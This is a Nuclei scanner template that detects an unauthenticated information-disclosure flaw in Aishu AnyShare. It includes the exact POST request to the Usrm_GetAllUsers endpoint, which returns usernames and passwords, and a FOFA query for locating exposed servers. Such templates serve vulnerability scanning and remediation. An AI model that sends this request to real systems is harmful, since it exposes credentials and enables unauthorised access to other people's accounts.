id: aishu-anyshare-info-exposure

info:
  name: Aishu AnyShare - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Aishu AnyShare intelligent content management platform Usrm_GetAllUsers interface has an information disclosure vulnerability, and unauthenticated attackers can obtain sensitive information such as usernames and passwords. You can log in to the background and put the system in a highly insecure state.
  remediation: |
    Ensure that the endpoint is protected and only accessible by authenticated and authorized users. Implement proper access controls and validate user permissions.
  reference:
    - https://cn-sec.com/archives/3431184.html
  metadata:
    verified: true
    max-request: 1
    vendor: aishu
    product: anyshare
    fofa-query: app="AISHU-AnyShare"
  tags: Eisoo-AnyShare

http:
  - raw:
      - |
        POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
        Host: {{Hostname}}

        [1,100]

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "directDeptInfo\":", "loginName\":", "password\":", "createTime\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f75f21d0b0a34b58b4b7c86b521107510d9096dc5bcf90bfe50193620e250b73022100d6a7f600dd732c459c62753853070273f672cc44eac15cf7061b412394e0f6c4:922c64590222798bb761d5b6d8e72950